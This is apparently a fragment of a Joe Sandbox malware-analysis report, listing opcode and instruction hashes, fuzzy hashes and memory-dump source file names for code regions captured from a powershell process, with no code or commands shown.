                                                                                                                                                                                                                                • Opcode ID: 1b05ef749838fb5de24595a380ecaf89394b96b9c9e350cc858b37a4a3706146
                                                                                                                                                                                                                                • Instruction ID: 6f5df54bf4f4558496fbc3519cd31cc1924dfde93dc0698c9b19748b0ed53bf1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b05ef749838fb5de24595a380ecaf89394b96b9c9e350cc858b37a4a3706146
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9019272B1CA1C0BE6689A8C78131BC73C2E7C9631F01033FE09EC3292DE26A8034586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2c82734d8e6d7e9b287a3f7e96bbf2b88bf45297935dbb889838cf9f06962209
                                                                                                                                                                                                                                • Instruction ID: fbc73a06ea9898aacc07c513bc750c0849c438f9af9ea7c21c23dbe41eb6fde2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c82734d8e6d7e9b287a3f7e96bbf2b88bf45297935dbb889838cf9f06962209
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C015272B1DA1C0BE7689A4D78122BC73D2E7C9631F05023FE59EC3392DE66A9434586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: aab97b14928457d31e586addba64e939618c5e56b3d339a75b68d365e85266ca
                                                                                                                                                                                                                                • Instruction ID: 4a09cf95e56f5dbc969244eaa098adbcb6336f4320ddb76de79a40e030e12b9a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab97b14928457d31e586addba64e939618c5e56b3d339a75b68d365e85266ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC015272B1CA1C0BE6689A4D68521BC73D2E7C9631F05433FE19EC3292DE25A8034586
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 26b61f9bf84653f0f4df8c98bcb13ed9b087f5405e7ba58b8fec3c8f624cc40b
                                                                                                                                                                                                                                • Instruction ID: 87c79646ef43961041544acc57f4d67661f98598eb6e66131169ee9ea13bf527
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26b61f9bf84653f0f4df8c98bcb13ed9b087f5405e7ba58b8fec3c8f624cc40b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88215E3060DA894FDBA5DB6CC464F61BBE1EF55350F1940A9D05DCB2A2CA65EC81CB40
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                • Instruction ID: 17cf545b06c68c12749fae18c059a1fd3c0929f1bc305d672c46b898a287b68f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8301A73120CB0C4FD748EF0CE051AA6B3E0FF85320F10056EE58AC36A1DA32E882CB45
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 410f5bad2220b808b6c5ef789697615d68cbc675f58ed87e3b5e3aa57a313cd3
                                                                                                                                                                                                                                • Instruction ID: ed648e2692a682d33ee1d4654b7fe4c8d5e7963b6ccc8b79eabb3080a19c97b6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 410f5bad2220b808b6c5ef789697615d68cbc675f58ed87e3b5e3aa57a313cd3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89F04C33A1D95C17EB205AB8BC248E87BD2EFC5354F06007AF41CC32A1E6A65D49C705
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: M_L
                                                                                                                                                                                                                                • API String ID: 0-290739141
                                                                                                                                                                                                                                • Opcode ID: 08567fe1008081f0b93b20d6131708292a584a254feaa15f7424f6494e150238
                                                                                                                                                                                                                                • Instruction ID: 9f9c9353f08ba4de6f20855fa1546bc3d95066cc5dab155b9707429368e6d26a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08567fe1008081f0b93b20d6131708292a584a254feaa15f7424f6494e150238
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49B1E431B18E494FEB6CEB5C84656B973D2FF98314F05027ED05AC72E6DE69A8028740
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000012.00000002.2979577546.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_18_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 4bfe5e1dedaf0585b685779ba86aa6a16399a33a2dfbad2796d384b4fb5be5c2
                                                                                                                                                                                                                                • Instruction ID: eadd2635e9cd518978e172365fae16cac7d426d2814234d6c14a679845a9e785
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bfe5e1dedaf0585b685779ba86aa6a16399a33a2dfbad2796d384b4fb5be5c2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B351A557B1F7E65EEB72576C58B60E97FA0DF63224B0A00FBC0D58B0A3DD4829068B51